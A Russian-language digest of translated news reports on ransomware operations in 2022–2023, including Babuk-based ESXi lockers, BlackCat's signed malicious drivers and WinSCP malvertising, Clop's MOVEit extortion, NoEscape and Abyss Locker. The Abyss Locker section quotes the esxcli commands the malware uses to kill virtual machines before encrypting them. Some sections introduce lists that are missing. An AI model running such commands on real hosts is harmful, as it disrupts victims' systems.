Список новых семейств программ-вымогателей, которые использовали его для создания новых шифраторов ESXi на основе Babuk со второго полугодия 2022 года (и соответствующие расширения, добавленные к зашифрованным файлам), включает Play (.FinDom), Mario (.emario), Conti POC (.conti). , REvil, также известный как Revix (.rhkrc), программа-вымогатель Cylance, Dataf Locker, Rorschach, также известный как BabLock, Lock4 и RTM Locker.
Как и ожидалось, утекший сборщик Babuk позволил злоумышленникам нацеливаться на системы Linux, даже если у них нет опыта для разработки собственных штаммов программ-вымогателей.
К сожалению, его использование другими семействами программ-вымогателей также значительно усложнило идентификацию виновных в атаках, поскольку использование одних и тех же инструментов несколькими участниками значительно усложняет усилия по атрибуции.
Они добавляются ко многим другим уникальным штаммам программ-вымогателей, не основанным на Babuk, нацеленным на виртуальные машины VMware ESXi, обнаруженным в дикой природе в течение нескольких лет.
Некоторые из найденных в дикой природе программ-вымогателей: Royal Ransomware, Nevada Ransomware, GwisinLocker Ransomware, Luna Ransomware, RedAlert Ransomware, а также Black Basta, LockBit, BlackMatter, AvosLocker, HelloKitty, REvil, RansomEXX и Hive.
Утечка исходного кода и ключей дешифрования
Операция по вымогательству Babuk (также известная как Babyk и Babuk Locker) всплыла в начале 2021 года, когда компании были атакованы двойным вымогательством.
Исходный код программы-вымогателя просочился на хакерский форум в сентябре 2021 года вместе с шифровальщиками VMware ESXi, NAS и Windows, а также шифровальщиками и дешифраторами, скомпилированными для некоторых пострадавших.
Вредоносные драйверы ядра Windows, используемые в атаках программ-вымогателей BlackCat
Было замечено, что группа вымогателей ALPHV (также известная как BlackCat) использует подписанные вредоносные драйверы ядра Windows, чтобы избежать обнаружения программным обеспечением безопасности во время атак.
Драйвер, обнаруженный Trend Micro, представляет собой улучшенную версию вредоносного ПО, известного как «POORTRY», которое Microsoft, Mandiant, Sophos и SentinelOne обнаружили в атаках программ-вымогателей в конце прошлого года.
Вредоносная программа POORTRY представляет собой драйвер ядра Windows, подписанный с использованием украденных ключей, принадлежащих законным учетным записям в программе Microsoft Windows Hardware Developer Program.
Этот вредоносный драйвер использовался хакерской группой UNC3944, также известной как 0ktapus и Scattered Spider, для прерывания работы программного обеспечения безопасности, работающего на устройстве Windows, чтобы избежать обнаружения.
Хотя программное обеспечение безопасности обычно защищено от прерывания или подделки, поскольку драйверы ядра Windows работают с самыми высокими привилегиями в операционной системе, их можно использовать для завершения практически любого процесса.
Trend Micro сообщает, что злоумышленники пытались использовать драйвер POORTRY, подписанный Microsoft, но показатели его обнаружения были высокими после того, как он получил огласку и после того, как ключи для подписи кода были отозваны.
Следовательно, хакеры развернули обновленную версию драйвера ядра POORTRY, подписанную с использованием украденного или просочившегося сертификата перекрестной подписи.
Новый драйвер, используемый программой-вымогателем BlackCat, помогает им повысить свои привилегии на скомпрометированных машинах, а затем остановить процессы, связанные с агентами безопасности.
Вредоносный драйвер ядра Windows
Подписанный драйвер, обнаруженный Trend Micro в атаках BlackCat в феврале 2023 года, называется «ktgn.sys», он был помещен в файловую систему жертвы в папке% Temp%, а затем загружен программой пользовательского режима с именем «tjr.exe».
Аналитики говорят, что цифровая подпись ktgn.sys была отозвана; однако драйвер по-прежнему без проблем загружается в 64-разрядных системах Windows с принудительными политиками подписи.
Вредоносный драйвер ядра предоставляет интерфейс IOCTL, который позволяет клиенту пользовательского режима, tjr.exe, выдавать команды, которые драйвер будет выполнять с привилегиями ядра Windows.
«Из нашего анализа того, что происходит, когда пользователь взаимодействует с этим драйвером, мы заметили, что он использует только один из открытых кодов управления вводом и выводом устройства (IOCTL) — Kill Process, который используется для уничтожения процессов агента безопасности, установленных в системе. », — поясняется в отчете Trend Micro.
Аналитики Trend Micro обнаружили незащищенные следующие команды, которые могут быть отправлены драйверу:
Активировать драйвер
Деактивировать драйвер после завершения работы клиента пользовательского режима.
Убить любой процесс пользовательского режима
Удалить определенные пути к файлам
Принудительно удалить файл, освободив его дескрипторы и завершив запущенные процессы, использующие его.
Копировать файлы
Принудительно копировать файлы, используя механизм, аналогичный принудительному удалению.
Регистрация обратных вызовов уведомлений процесса/потока
Отменить регистрацию обратных вызовов уведомлений процесса/потока
Перезагрузите систему, вызвав API HalReturnToFirmware.
Trend Micro отмечает, что две команды, используемые для обратных вызовов Process/Thread Notification, не работают, что указывает на то, что драйвер в настоящее время находится в стадии разработки или тестирования.
Системным администраторам рекомендуется использовать индикаторы компрометации, используемые Trend Micro, и добавлять вредоносные драйверы, используемые злоумышленниками-вымогателями, в черный список драйверов Windows.
Администраторы Windows также должны убедиться, что включено «Принудительное применение подписи драйверов», что блокирует установку любых драйверов, не имеющих действительной цифровой подписи.
Clop взял на себя ответственность за атаку на MOVEit
Clop сообщила, что они стоят за атаками с целью кражи данных MOVEit Transfer, когда использовалась уязвимость нулевого дня для взлома серверов нескольких компаний и кражи данных.
Представитель Clop также подтвердил, что они начали использовать уязвимость 27 мая, во время долгого празднования Дня поминовения в США, как ранее сообщал Mandiant.
Проведение атак в праздничные дни — обычная тактика для операции по вымогательству Clop, которая ранее предпринимала крупномасштабные атаки в праздничные дни, когда персонал был минимальным.
Например, они использовали аналогичную уязвимость нулевого дня Accellion FTA 23 декабря 2020 года, чтобы украсть данные прямо в начале рождественских каникул.
Хотя Clop не сообщил количество организаций, взломанных в результате атак MOVEit Transfer, они сказали, что жертвы будут отображаться на их сайте утечки данных, если выкуп не будет выплачен.
Кроме того, кибергруппа подтвердила, что они не начали вымогать деньги у жертв, вероятно, используя время для просмотра данных и определения того, что является ценным и как это можно использовать для получения выкупа от взломанных компаний.
В недавних атаках на GoAnywhere MFT Clop ждал более месяца, чтобы отправить организациям требования о выкупе по электронной почте.
В конце концов, и без подсказки, кибергруппа сообщила, что они удалили все данные, украденные у правительств, военных и детских больниц во время этих атак.
«Я хочу вам сразу сказать, что военные, детские больницы, правительство и т. д., подобные этому, мы не атаковали, и их данные были стерты», — сказал Clop в своем электронном письме.
Хотя Clop начинался как операция по вымогательству, группа ранее сообщила BleepingComputer, что они отходят от шифрования и вместо этого предпочитают вымогательство с целью кражи данных.
Появляются первые жертвы
Мы также увидели наши первые раскрытия от организаций, взломанных в результате атак кражи данных Clop MOVEit.
Британский поставщик решений для расчета заработной платы и управления персоналом Zellis подтвердил, что из-за этих атак у него произошла утечка данных, которая также затронула некоторых его клиентов.
«Большое количество компаний по всему миру пострадало от уязвимости нулевого дня в продукте Progress Software MOVEit Transfer», — сказал Зеллис в заявлении BleepingComputer.
К сожалению, как мы видели в предыдущих атаках Clop на управляемые платформы передачи файлов, со временем мы, вероятно, увидим длинный поток раскрытий информации от компаний.
Clop начала вымогать деньги у компаний, пострадавших от атак кражи данных MOVEit, сначала перечислив названия компаний на сайте утечки данных — часто используемая тактика перед публичным раскрытием украденной информации.
Эти записи появились после того, как 27 мая злоумышленники воспользовались уязвимостью нулевого дня в платформе безопасной передачи файлов MOVEit Transfer для кражи файлов, хранящихся на сервере.
Clop взял на себя ответственность за атаки, заявив, что взломал «сотни компаний», и предупредив, что их имена будут добавлены на сайт утечки данных 14 июня, если переговоры не состоятся.
По словам злоумышленников, если требование о вымогательстве не будет оплачено, они начнут публиковать украденные данные 21 июня.
Уже раскрытые утечки данных
Другие организации, которые уже раскрыли нарушения MOVEit Transfer, включают Zellis (BBC, Boots и Aer Lingus, Ирландская ВШЭ через Zellis), Университет Рочестера, правительство Новой Шотландии, американский штат Миссури, американский штат Иллинойс, BORN Ontario, Ofcam, Extreme Networks и Американский совет по внутренним болезням.
В прошлых подобных атаках с использованием уязвимостей нулевого дня в Accellion FTA, GoAnywhere MFT и атаках с управляемой передачей файлов SolarWinds Serv-U злоумышленники требовали выкуп в размере 10 миллионов долларов, чтобы предотвратить утечку данных.
Программа-вымогатель BlackCat продвигает Cobalt Strike через поисковые объявления WinSCP
Группа вымогателей BlackCat (также известная как ALPHV) проводит вредоносные кампании, чтобы заманить людей на поддельные страницы, которые имитируют официальный сайт приложения для передачи файлов WinSCP для Windows, но вместо этого продвигают установщики, зараженные вредоносным ПО.
WinSCP (Windows Secure Copy) — это популярный бесплатный клиент SFTP, FTP, S3, SCP и файловый менеджер с открытым исходным кодом с возможностями передачи файлов SSH, который загружается 400 000 раз в неделю только на SourceForge.
BlackCat использует программу как приманку, чтобы потенциально заразить компьютеры системных администраторов, веб-администраторов и ИТ-специалистов для первоначального доступа к ценным корпоративным сетям.
Этот ранее неизвестный вектор заражения вымогателем ALPHV был обнаружен аналитиками Trend Micro, которые заметили рекламные кампании, продвигающие поддельные страницы на поисковых страницах Google и Bing.
От WinSCP к CobaltStrike
Атака BlackCat, начинается с того, что жертва ищет «WinSCP Download» в Bing или Google и получает продвигаемые вредоносные результаты, которые ранжируются выше безопасных сайтов загрузки WinSCP.
Жертвы нажимают на эти объявления и посещают веб-сайт, на котором размещены учебные пособия по выполнению автоматической передачи файлов с помощью WinSCP.
Эти сайты не содержат ничего вредоносного и, вероятно, не обнаруживаются поисковыми роботами Google, но перенаправляют посетителей на клон официального веб-сайта WinSCP с кнопкой загрузки. Эти клоны используют доменные имена, аналогичные реальному домену winscp.net для утилиты, например winscp[.]com.
Жертва нажимает кнопку и получает файл ISO, содержащий «setup.exe» и «msi.dll», первый из которых является приманкой для запуска пользователем, а второй — дроппером вредоносного ПО, запускаемым исполняемым файлом.
«После запуска setup.exe он вызовет msi.dll, который позже извлечет папку Python из раздела DLL RCDATA в качестве реального установщика для WinSCP, который будет установлен на машине».
Этот процесс также устанавливает троянизированную python310.dll и создает механизм сохраняемости, создавая ключ запуска с именем «Python» и значением «C:\Users\Public\Music\python\pythonw.exe».
Исполняемый файл pythonw.exe загружает модифицированную запутанную python310.dll, содержащую маяк Cobalt Strike, который подключается к адресу сервера управления и контроля.
Другие инструменты, используемые ALPHV
Имея в системе запущенный Cobalt Strike, легко выполнять дополнительные скрипты, извлекать инструменты для бокового перемещения и вообще углублять компрометацию.
Аналитики Trend Micro заметили, что на последующих этапах операторы ALPHV использовали следующие инструменты:
AdFind: инструмент командной строки, используемый для получения информации Active Directory (AD).
Команды PowerShell, используемые для сбора пользовательских данных, извлечения ZIP-файлов и выполнения сценариев.
AccessChk64: инструмент командной строки, используемый для разведки разрешений пользователей и групп.
Findstr: инструмент командной строки, используемый для поиска паролей в файлах XML.
PowerView: сценарий PowerSploit, используемый для разведки и перечисления AD.
Скрипты Python, используемые для запуска инструмента восстановления пароля LaZagne и получения учетных данных Veeam.
PsExec, BitsAdmin и Curl, используемые для бокового перемещения
AnyDesk: злоупотребление законным инструментом удаленного управления для поддержания постоянства
Скрипт KillAV BAT, используемый для отключения или обхода антивирусных и антивредоносных программ.
Клиент PuTTY Secure Copy, используемый для эксфильтрации собранной информации из взломанной системы.
Наряду с вышеупомянутыми инструментами ALPHV также использовал SpyBoy «Терминатор», EDR и антивирусный блокировщик, продаваемый злоумышленниками на русскоязычных хакерских форумах за 3000 долларов.
Недавнее исследование CrowdStrike подтвердило, что «Терминатор» способен обходить несколько инструментов безопасности Windows, используя механизм «принеси свой собственный уязвимый драйвер» (BYOVD) для повышения привилегий в системе и их деактивации.
Trend Micro заявляет, что связывает вышеуказанные TTP с подтвержденным заражением программами-вымогателями ALPHV.
Новая операция по вымогательству NoEscape считается ребрендингом Avaddon, которая закрылась и выпустила свои ключи дешифрования в 2021 году.
NoEscape был запущен в июне 2023 года, когда он начал атаковать предприятия с помощью двойного вымогательства. В рамках этих атак злоумышленники крадут данные и шифруют файлы на серверах Windows, Linux и VMware ESXi.
Затем злоумышленники угрожают публично раскрыть украденные данные, если выкуп не будет выплачен. BleepingComputer известно о требованиях программы-вымогателя NoEscape от сотен тысяч до более чем 10 миллионов долларов.
Известно, что NoEscape не позволяет своим членам нацеливаться на страны СНГ (бывшего Советского Союза), а жертвы из этих стран получают бесплатные дешифраторы и информацию о том, как они были взломаны.
В настоящее время NoEscape перечислила десять компаний из разных стран и отраслей на своем сайте утечки данных, показывая, что они не нацелены на конкретную вертикаль.
Ребрендинг Avaddon
Операция по вымогательству Avaddon была запущена в июне 2020 года с использованием фишинговых кампаний, нацеленных на корпоративных жертв.
Однако в июне 2021 года Avaddon внезапно прекратила свою деятельность и поделилась ключами дешифрования жертв с BleepingComputer в анонимном сообщении.
С тех пор не было никаких известных программ-вымогателей, связанных с субъектами угроз, до прошлого месяца, когда была запущена операция NoEscape.
Создатель ID-Ransomware и эксперт по программам-вымогателям Майкл Гиллеспи сообщил, что программы-шифровальщики NoEscape и Avaddon практически идентичны, за исключением одного заметного изменения в алгоритмах шифрования.
Ранее шифровальщик Avaddon использовал AES для шифрования файлов, а NoEscape переключился на алгоритм Salsa20.
В остальном шифраторы практически идентичны, с почти идентичными логикой шифрования и форматами файлов, включая уникальный способ «разбиения больших двоичных объектов, зашифрованных RSA».
Шифровальщик NoEscape
При выполнении NoEscape выполнит следующие команды для удаления теневых копий томов Windows, локальных каталогов резервных копий Windows и отключения автоматического восстановления Windows.
Затем шифратор начнет завершать следующие процессы, в том числе связанные с программным обеспечением безопасности, приложениями резервного копирования, а также веб-серверами и серверами баз данных.
Это также остановит следующие службы Windows, связанные с базами данных, QuickBooks, программным обеспечением безопасности и платформами виртуальных машин.
Программа-вымогатель завершает работу этих приложений, чтобы разблокировать файлы, которые можно открыть и предотвратить шифрование.
Однако, даже если файлы заблокированы, шифровальщик использует API диспетчера перезагрузки Windows, чтобы закрыть процессы или отключить службы Windows, которые могут оставить файл открытым и предотвратить шифрование.
При шифровании файлов шифратор пропустит все файлы со следующими расширениями:
Во время шифрования Гиллеспи говорит, что его можно настроить на использование трех режимов:
Полный — весь файл зашифрован
Частичное — шифруются только первые X мегабайт.
Chunked — использует прерывистое шифрование для шифрования фрагментов данных.
Однако NoEscape включает параметр конфигурации, который заставляет шифратор полностью шифровать файлы с расширениями файлов accdb, edb, mdb, mdf, mds, ndf и sql.
Файлы шифруются с помощью Salsa20, при этом ключ шифрования зашифрован с помощью закрытого ключа RSA в комплекте. Зашифрованные файлы будут иметь расширение из 10 символов, добавленное к имени файла, уникальное для каждой жертвы.
Программа-вымогатель также изменит обои Windows на изображение, сообщающее жертвам, что они могут найти инструкции в заметках о выкупе с именем HOW_TO_RECOVER_FILES.txt.
В Linux файл /etc/motd также заменяется примечанием о выкупе, которое отображается жертвам при входе в систему.
Примечания о выкупе содержат «личный идентификатор», необходимый для входа на платежный сайт Tor злоумышленника и доступа к уникальной странице переговоров жертвы. На этой странице указана сумма выкупа в биткойнах, функция тестовой расшифровки и панель чата для переговоров с злоумышленниками.
ALPHV добавляет API утечки данных в новую стратегию вымогательства
ALPHV/BlackCat, пытается оказать большее давление на своих жертв, чтобы они заплатили выкуп, предоставляя API для своего сайта утечки, чтобы повысить видимость своих атак.
Этот шаг следует за недавним взломом Estée Lauder, который закончился тем, что косметическая компания полностью проигнорировала попытку злоумышленника вступить в переговоры о выплате выкупа.
Вызовы API и сканер Python
Ранее на этой неделе несколько исследователей заметили, что сайт утечки данных ALPHV/BlackCat добавил новую страницу с инструкциями по использованию их API для сбора своевременных обновлений о новых жертвах.
API или интерфейсы прикладного программирования обычно используются для обеспечения связи между двумя программными компонентами на основе согласованных определений и протоколов.
Исследовательская группа вредоносных программ VX-Underground указала на новый раздел на сайте ALPHV, но похоже, что эта «функция» была частично доступна в течение нескольких месяцев, хотя и не для более широкой аудитории.
ALPHV опубликовала вызовы API, которые помогут получить различную информацию о новых жертвах, добавленных на их сайт утечки, или обновлениях, начиная с определенной даты.
Группа также предоставила сканер, написанный на Python, чтобы помочь получить последнюю информацию о месте утечки данных.
Меньше платящих жертв
Хотя ALPHV не объяснила выпуск API, одной из причин может быть то, что меньше жертв поддаются требованиям программ-вымогателей.
В отчете компании Coveware, занимающейся реагированием на инциденты с программами-вымогателями, отмечается, что во втором квартале этого года количество платящих жертв, пострадавших от атаки программ-вымогателей, «упало до рекордно низкого уровня в 34%».
Тем не менее, некоторые злоумышленники продолжают зарабатывать большие деньги, сосредоточив внимание на цепочке поставок, чтобы взломать большое количество организаций.
Например, программа-вымогатель Clop, по оценкам, заработала не менее 75 миллионов долларов на своей масштабной кампании по краже данных MOVEit.
Clop теперь пропускает данные, украденные в атаках MOVEit, на сайты ClearWeb
Clop копирует тактику вымогательства от ALPHV, создавая доступные в Интернете веб-сайты, посвященные конкретным жертвам, упрощая утечку украденных данных и оказывая дополнительное давление на жертв, чтобы они заплатили выкуп.
Когда злоумышленники атакуют корпоративную цель, они сначала крадут данные из сети, а затем шифруют файлы. Эти украденные данные используются в качестве рычага в атаках с двойным вымогательством, предупреждая жертв о том, что данные будут утеряны, если не будет выплачен выкуп.
Места утечки данных программ-вымогателей обычно расположены в сети Tor, поскольку это затрудняет закрытие веб-сайта или правоохранительным органам захват их инфраструктуры.
Однако этот метод хостинга имеет свои проблемы для операторов программ-вымогателей, поскольку для доступа к сайтам требуется специализированный браузер Tor, поисковые системы не индексируют просочившиеся данные, а скорость загрузки обычно очень низкая.
Чтобы преодолеть эти препятствия, в прошлом году операция по вымогательству ALPHV, также известная как BlackCat, представила новую тактику вымогательства, заключающуюся в создании веб-сайтов для утечки украденных данных, которые рекламировались как способ для сотрудников проверить, не произошла ли утечка их данных.
Веб-сайт clearweb размещается непосредственно в Интернете, а не в анонимных сетях, таких как Tor, для доступа к которым требуется специальное программное обеспечение.
Этот новый метод упрощает доступ к данным и, вероятно, приведет к их индексации поисковыми системами, что еще больше расширит распространение утекшей информации.
Пустая трата времени?
Эти сайты нацелены на то, чтобы напугать сотрудников, руководителей и деловых партнеров, которые могли быть затронуты украденными данными, надеясь, что это заставит их оказать дополнительное давление на компанию, чтобы она заплатила выкуп.
Однако, несмотря на то, что такая утечка данных может иметь некоторые преимущества, она также сопряжена со своими проблемами, поскольку их размещение в Интернете, а не через Tor, значительно упрощает их удаление.
В настоящее время все известные сайты-вымогатели Clop clearweb отключены.
Неясно, были ли эти сайты недоступны из-за конфискации правоохранительными органами, DDoS-атак со стороны фирм, занимающихся кибербезопасностью, или закрытия сайтов хостинг-провайдерами и регистраторами.
Linux-версия Abyss Locker нацелена на серверы VMware ESXi
Abyss Locker является последней разработкой шифровальщика Linux для атак на платформу виртуальных машин VMware ESXi при атаках на предприятие.
По мере того, как предприятие переходит от отдельных серверов к виртуальным машинам для лучшего управления ресурсами, производительности и аварийного восстановления, злоумышленники создают шифраторы, нацеленные на платформу.
Поскольку VMware ESXi является одной из самых популярных платформ виртуальных машин, почти каждая кибергруппа начала выпускать шифраторы Linux для шифрования всех виртуальных серверов на устройстве.
Другие операции с программами-вымогателями, использующие шифровальщики программ-вымогателей Linux, в основном нацеленные на VMware ESXi, включают Akira, Royal, Black Basta, LockBit, BlackMatter, AvosLocker, REvil, HelloKitty, RansomEXX и Hive.
Abyss Locker — это относительно новая операция по вымогательству, которая, как считается, была запущена в марте 2023 года, когда она начала атаковать компании.
Как и другие операции с программами-вымогателями, злоумышленники Abyss Locker взламывают корпоративные сети, похищают данные для двойного вымогательства и шифруют устройства в сети.
Украденные данные затем используются в качестве рычага, угрожая утечкой файлов, если выкуп не будет выплачен. Для утечки украденных файлов злоумышленники создали сайт утечки данных Tor под названием «Abyss-data», на котором в настоящее время перечислены четырнадцать жертв.
Злоумышленники утверждают, что украли от 35 ГБ данных у одной компании до 700 ГБ у другой.
Ориентация на серверы VMware ESXi
На этой неделе исследователь безопасности MalwareHunterTeam обнаружил ELF-шифровальщик Linux для операции Abyss Locker и поделился им с BleepingComputer для анализа.
После просмотра строк в исполняемом файле становится ясно, что шифровальщик специально нацелен на серверы VMware ESXi.
Как видно из приведенных ниже команд, шифровальщик использует инструмент управления VMware ESXi из командной строки esxcli, чтобы сначала составить список всех доступных виртуальных машин, а затем завершить их работу.
esxcli vm process list
esxcli vm process kill -t=soft -w=%d
esxcli vm process kill -t=hard -w=%d
esxcli vm process kill -t=force -w=%d
Шифровальщик завершает работу всех виртуальных машин, чтобы обеспечить правильное шифрование связанных виртуальных дисков, моментальных снимков и метаданных путем шифрования всех файлов со следующими расширениями: .vmdk (виртуальные диски), .vmsd (метаданные) и .vmsn (моментальные снимки).
В дополнение к нацеливанию на виртуальные машины программа-вымогатель также будет шифровать все другие файлы на устройстве и добавлять расширение .crypt к их именам.
Для каждого файла шифровальщик также создаст файл с расширением .README_TO_RESTORE, который действует как примечание о выкупе.
Эта записка о выкупе содержит информацию о том, что случилось с файлами, и уникальную ссылку на сайт переговоров Tor злоумышленника. Этот сайт очень прост, имеет только панель чата, которую можно использовать для переговоров с бандой вымогателей.
Эксперт по программам-вымогателям Майкл Гиллеспи сказал, что шифровальщик Abyss Locker Linux основан на Hello Kitty, но вместо этого использует шифрование ChaCha.
Программа-вымогатель Sphynx от BlackCat включает в себя Impacket и RemCom
Microsoft обнаружила новую версию программы-вымогателя BlackCat, которая включает в себя сетевую структуру Impacket и хакерский инструмент Remcom, которые позволяют распространяться по взломанной сети.
В апреле исследователь кибербезопасности VX-Underground написал в Твиттере о новой версии шифровальщика BlackCat/ALPHV под названием Sphynx.
«Рады сообщить вам, что тестирование основных возможностей ALPHV/BlackCat 2.0: Sphynx завершено», — сообщили операторы BlackCat в сообщении своим аффилиатам.
«Код, включая шифрование, был полностью переписан с нуля. По умолчанию все файлы заморожены. Основным приоритетом этого обновления была оптимизация обнаружения с помощью AV/EDR», — далее объясняются операции вымогателя.
Вскоре после этого IBM Security X-Force подробно изучила новый шифровальщик BlackCat, предупредив, что шифровальщик превратился в набор инструментов.
Это было основано на строках в исполняемом файле, которые указывали, что он содержит impacket, используемый для постэксплуатационных функций, таких как удаленное выполнение и сброс секретов из процессов.
Шифровальщик BlackCat Sphynx
Microsoft Threat Intelligence сообщила, что они также проанализировали новую версию Sphynx и обнаружили, что она использует инфраструктуру Impacket для бокового распространения в скомпрометированных сетях.
«Microsoft обнаружила, что в недавних кампаниях использовалась новая версия программы-вымогателя BlackCat», — сообщила Microsoft.
«Эта версия включает инструмент инфраструктуры связи с открытым исходным кодом Impacket, который злоумышленники используют для облегчения бокового перемещения в целевой среде».
Impacket описывается как коллекция классов Python с открытым исходным кодом для работы с сетевыми протоколами.
Тем не менее, он чаще используется тестировщиками проникновения, красными командами и злоумышленниками в качестве набора инструментов после эксплуатации для бокового распространения в сети, вывода учетных данных из процессов, выполнения ретрансляционных атак NTLM и многого другого.
Impacket стал очень популярным среди злоумышленников, которые взламывают устройство в сети, а затем используют инфраструктуру для получения повышенных учетных данных и доступа к другим устройствам.
Согласно Microsoft, операция BlackCat использует инфраструктуру Impacket для дублирования учетных данных и удаленного запуска службы для развертывания шифровальщика по всей сети.
Microsoft сообщает, что помимо Impacket в шифратор встроен хакерский инструмент Remcom, который представляет собой небольшую удаленную оболочку, позволяющую шифровальщику удаленно выполнять команды на других устройствах в сети.
В частном информационном бюллетене Microsoft 365 Defender Threat Analytics, с которым ознакомился BleepingComputer, Microsoft сообщает, что они видели это новое шифрование, используемое дочерней компанией BlackCat «Storm-0875» с июля 2023 года.
Microsoft идентифицирует эту новую версию как BlackCat 3.0, хотя, как мы уже говорили, операция по вымогательству называет ее «Sphynx» или «BlackCat/ALPHV 2.0» в общении с аффилированными лицами.
BlackCat, также известная как ALPHV, начала свою работу в ноябре 2021 года и, как полагают, является ребрендингом DarkSide/BlackMatter.
Эта группа всегда считалась одной из самых передовых и высококлассных операций постоянно совершенствует свою деятельность с помощью новых тактик.
Например, прошлым летом в качестве новой тактики вымогательства группа создала веб-сайт, посвященный утечке данных для конкретной жертвы, чтобы клиенты и сотрудники могли проверить, не раскрыты ли их данные.
Совсем недавно злоумышленники создали API утечки данных, упрощающий распространение украденных данных.
Благодаря тому, что шифровальщик BlackCat превратился из дешифратора в полноценный набор инструментов для пост-эксплуатации, он позволяет аффилированным лицам-вымогателям быстрее развертывать шифрование файлов в сети.
Поскольку очень важно обнаруживать атаки программ-вымогателей, как только они происходят, добавление этих инструментов только усложняет задачу для защитников.
Над всей Испанией фишинговые атаки с участием Lockbit Locker
Национальная полиция Испании предупреждает о продолжающейся кампании по вымогательству LockBit Locker, нацеленной на архитектурные компании в стране посредством фишинговых электронных писем.
"Зафиксирована волна рассылки электронных писем архитектурным компаниям, хотя не исключено, что они распространят свою деятельность и на другие отрасли", - говорится в переведенном на машине сообщении полиции.
«Обнаруженная кампания имеет очень высокий уровень сложности, поскольку жертвы ничего не подозревают, пока не подвергнутся шифрованию терминалов».
Киберполиция Испании обнаружила, что многие электронные письма отправляются с несуществующего домена «fotoprix.eu» и выдают себя за фотофирму.
Злоумышленники выдают себя за недавно открывшийся фотомагазин и запрашивают у архитектурной фирмы план реконструкции/развития объекта и смету на работы.
После обмена несколькими электронными письмами для укрепления доверия операторы LockBit предлагают назначить дату встречи для обсуждения бюджета и деталей строительного проекта и отправить архив с документами с точными спецификациями ремонта.
Хотя испанский вариант не содержит особых технических подробностей, в образце, этот архив представляет собой файл образа диска (.img), который при открытии в более новых версиях Windows автоматически монтирует файл как букву диска и отображает его содержание.
Эти архивы содержат папку с именем «fotoprix», содержащую множество файлов Python, пакетных файлов и исполняемых файлов. Архив также содержит ярлык Windows с именем «Caracteristicas», который при запуске запускает вредоносный скрипт Python.
Анализ BleepingComputer показывает, что выполняемый скрипт Python проверит, является ли пользователь администратором устройства, и если да, то внесет изменения в систему для обеспечения устойчивости, а затем запустит программу-вымогатель LockBit Locker для шифрования файлов.
Если пользователь Windows не является администратором на устройстве, он будет использовать обход Fodhelper UAC для запуска шифровальщика-вымогателя с правами администратора.
BleepingComputer полагает, что эта кампания проводится различными злоумышленниками, использующими утекший в сеть сборщик программ-вымогателей LockBit 3.0.
Обычная операция LockBit осуществляет переговоры через сайт переговоров Tor, в то время как этот «LockBit Locker» ведет переговоры по электронной почте «[email protected]» или через платформу обмена сообщениями Tox.
Кроме того, автоматический анализ с помощью сканирующего механизма Intezer идентифицирует исполняемый файл программы-вымогателя как BlackMatter, которая была прекращена в 2021 году и позже переименована в ALPHV/BlackCat.
Однако это ожидаемо, поскольку просочившийся сборщик LockBit 3.0, также известный как LockBit Black, также идентифицируется Intezer как BlackMatter из-за использования исходного кода BlackMatter.
Учитывая изощренность фишинговых писем и социальной инженерии, вполне вероятно, что злоумышленники, стоящие за этой кампанией, используют различные приманки для компаний из других секторов.
Субъекты фишинга широко использовали приманку «призыв к участию в торгах» в кампаниях, выдавая себя за частные фирмы или государственные учреждения и используя хорошо составленные документы, чтобы убедить в легитимности своих сообщений.
BlackCat проникла в хранилище Azure с помощью шифровальщика Sphynx
BlackCat (ALPHV) теперь использует украденные учетные записи Microsoft и недавно обнаруженный шифратор Sphynx для шифрования облачного хранилища Azure.
В ходе расследования недавнего взлома сотрудники службы реагирования на инциденты Sophos X-Ops обнаружили, что злоумышленники использовали новый вариант Sphynx с дополнительной поддержкой использования пользовательских учетных данных.
Получив доступ к учетной записи Sophos Central с помощью украденного одноразового пароля (OTP), они отключили защиту от несанкционированного доступа и изменили политику безопасности.
Данные действия стали возможны после кражи OTP из хранилища LastPass жертвы с помощью расширения LastPass Chrome.
Впоследствии они зашифровали системы клиента Sophos и удаленное облачное хранилище Azure, а также добавили расширение .zk09cvt ко всем заблокированным файлам. В общей сложности операторам программ-вымогателей удалось успешно зашифровать 39 учетных записей хранилища Azure.
Они проникли на портал Azure жертвы, используя украденный ключ Azure, который предоставил им доступ к целевым учетным записям хранения. Ключи, использованные в атаке, были внедрены в двоичный файл программы-вымогателя после кодирования с использованием Base64.
Во время взлома злоумышленники также использовали несколько инструментов удаленного мониторинга и управления (RMM), таких как AnyDesk, Splashtop и Atera.
Sophos обнаружила вариант Spynx в марте 2023 года во время расследования утечки данных, которая имела сходство с другой атакой, описанной в отчете IBM-Xforce, опубликованном в мае (в обоих случаях для извлечения украденных данных использовался инструмент ExMatter).
В прошлом месяце Microsoft также обнаружила, что новый шифратор Sphynx включает в себя хакерский инструмент Remcom и сетевую структуру Impacket для горизонтального перемещения по взломанным сетям.
BlackCat/ALPHV — программа-вымогатель, появившаяся в ноябре 2021 года. Предполагается, что это ребрендинг DarkSide/BlackMatter.
На этой неделе одна из дочерних групп(отслеживаемая как Scattered Spider) заявила об атаке на MGM Resorts, заявив, что они зашифровали более 100 гипервизоров ESXi после того, как компания отключила свою внутреннюю инфраструктуру и отказалась вести переговоры о выплате выкупа.
Атаки программ-вымогателей теперь нацелены на непропатченные серверы WS_FTP
Доступные в Интернете серверы WS_FTP, на которых не установлены патчи, закрывающие уязвимость максимальной серьезности, теперь подвергаются атакам программ-вымогателей.
Как недавно заметили специалисты по реагированию на инциденты Sophos X-Ops, злоумышленники, назвавшие себя киберпреступной группой Reichsadler, безуспешно попытались развернуть полезные нагрузки программ-вымогателей, созданные с помощью сборщика LockBit 3.0, украденного в сентябре 2022 года.
«Злоумышленники-вымогатели не стали долго ждать, чтобы воспользоваться недавно обнаруженной уязвимостью в программном обеспечении сервера WS_FTP», — заявили в Sophos X-Ops.
«Несмотря на то, что Progress Software выпустила исправление для этой уязвимости в сентябре 2023 года, не все серверы были исправлены. Sophos X-Ops наблюдала безуспешные попытки развернуть программы-вымогатели через неисправленные сервисы».
Злоумышленники попытались повысить привилегии с помощью инструмента GodPotato с открытым исходным кодом, который позволяет повысить привилегии до «NT AUTHORITY\SYSTEM» на клиентских (от Windows 8 до Windows 11) и серверных (от Windows Server 2012 до Windows Server 2022) платформах Windows.
К счастью, их попытка развернуть полезные нагрузки программы-вымогателя в системах жертвы была пресечена, что не позволило злоумышленникам зашифровать данные цели.
Несмотря на то, что им не удалось зашифровать файлы, злоумышленники все равно потребовали выкуп в размере 500 долларов, который необходимо было выплатить до 15 октября по московскому времени.
Низкий размер выкупа указывает на то, что уязвимые серверы WS_FTP, открытые для доступа в Интернет, могут стать объектом массовых автоматических атак или неопытных программ-вымогателей.
